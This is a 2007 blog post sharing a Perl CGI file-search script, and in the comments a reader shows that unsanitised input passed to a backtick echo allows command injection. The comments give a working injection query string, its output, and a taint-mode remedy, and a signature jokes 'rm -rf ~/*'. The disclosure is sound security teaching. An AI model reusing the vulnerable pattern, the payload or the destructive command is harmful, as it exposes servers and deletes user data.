Weblog entry #1 for w1d3

See all weblog entries made by w1d3.

XML logo

#1
web locate
Posted by w1d3 on Fri 16 Feb 2007 at 17:54
Tags:
Yesterday I made this very simple cgi script to search in my music and video archive. It uses the 'locate' command and displays results in html so I don't have to log into my storage machine all the time :) It should remove all non-alphanumeric characters from query and also log the query words. 
#!/usr/bin/perl -w

use CGI qw(:standard);
use strict;

print header;
print start_html(-title=>'web locate');

print startform,
"locate \ " ,
textfield(-name=>'query',
          -size=>20,
          -maxlength=>20),
" \ | grep mp3 wav avi mpg m2v wmv \ ",
submit(-value=>'Enter'),
endform;

print hr;
if(param){
        my $word = param('query');
        `echo \'$word\' >> search.log`;
        if(length($word) < 3){
                print "longer pls", p;
        }else{
                $word =~ tr/a-zA-Z0-9//cd;
                my $result = `locate -i $word | grep -i -e mp3 -e wav -e avi -e mpg -e m2v -e wmv`;
                $result =~ s/\n/
/g;
                print $result;
        }
};

print end_html;
I hope that someone will find it useful, it's also quite easy to change it according to your needs, to find other file types etc.. feedback welcome! :)
[7 Comments | Add Comment | XML logo ]

 

Comments on this Entry

#
Re: web locate
Posted by w1d3 (85.145.xx.xx) on Fri 16 Feb 2007 at 17:57
[ Send Message | View Weblogs ]
sorry, \&nbsp; changed into \ in the pasted code :(

[ Parent | Reply to this comment ]

#
Re: web locate
Posted by Steve (62.30.xx.xx) on Fri 16 Feb 2007 at 22:34
[ Send Message | View Steve's Scratchpad | View Weblogs ]

Congratulations - you've just allowed remote users to execute arbitary commands upon your server..!

Although you delete non-alphanumeric characters before executing your locate command you do not do so before logging.

Consider this code:

if(param){
        my $word = param('query');
        `echo \'$word\' >> search.log`;
...
}

Now consider the following query string:

word=test'%0d;/usr/bin/id%3E/tmp/foo

This decodes to:

test'
;/usr/bin/id>/tmp/foo

Which together becomes:

 echo 'test'
 /usr/bin/id>/tmp/foo >> search.log

Leaving:

skx@mine:~/cvs/yawns$ ls /tmp/fof^M -l
-rw-r--r-- 1 www-data www-data 54 2007-02-16 22:30 /tmp/fof?
skx@mine:~/cvs/yawns$ cat /tmp/fof^M
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Suprise!

Steve

[ Parent | Reply to this comment ]

#
Re: web locate
Posted by w1d3 (85.145.xx.xx) on Fri 16 Feb 2007 at 23:53
[ Send Message | View Weblogs ]
nice, this exactly what I wanted to know :) thanks

[ Parent | Reply to this comment ]

#
Re: web locate
Posted by Anonymous (59.176.xx.xx) on Sun 18 Feb 2007 at 06:32
Tee hee! Well spotted Steve! Go to the front of the class and collect your gold star!

For the rest of us who don't quite manage to get into Steve's state of Vulcan mindmeld with perl code, the taint (-T) option will give you a slap across the wrist during coding. Use it!

PJ

[ Parent | Reply to this comment ]

#
Re: web locate
Posted by jonesy (220.233.xx.xx) on Sat 17 Feb 2007 at 23:49
[ Send Message | View Weblogs ]
I actually wrote a very similar perl web inteface for searching for files a few months back, with a couple of differences;

* I used a cpan module to interface with slocate
* I build separate slocate databases, so that I only indexed locations I wanted to rather than the whole filesytem.

-Jonesy

[ Parent | Reply to this comment ]

#
Re: web locate
Posted by w1d3 (85.145.xx.xx) on Tue 20 Feb 2007 at 16:45
[ Send Message | View Weblogs ]
I wanted to make it as simple as possible.. The locate database is already present in the system and is updated regularly (frequently enough for me) so there is no need to build another one. And specific location can be easily grep-ed from the answer. But I agree that different approach may be more appropriate in specific case.

[ Parent | Reply to this comment ]

#
Re: web locate
Posted by busfault (69.205.xx.xx) on Sun 18 Feb 2007 at 02:39
[ Send Message | View Weblogs ]
This has reminded me how much I hate "special characters". For one, go and try to look up special characters on any search engine, gives you NOTHING. However, I believe that these characters should somehow be used in a search since there are times when it can become necessary. For example: what if you were a new perl user and didn't know what $? means? try looking for that online... (even trying to escape the chars) good luck! Its kind of funny, since google gives back an unexpected result in format when you search for them, as apposed to "Your search - $? - did not match any documents." as one might expect, it is a blank google page. Most perl sites search pages can't handle them either. I understand the whole regexp and arbitraty commands on server issue, but it can be annoying if they are removed.
-Tom
Running out of disk quota space, try rm -rf ~/*
Having horrible computer karma? Install Linux, your computer problems shall vanish.

[ Parent | Reply to this comment ]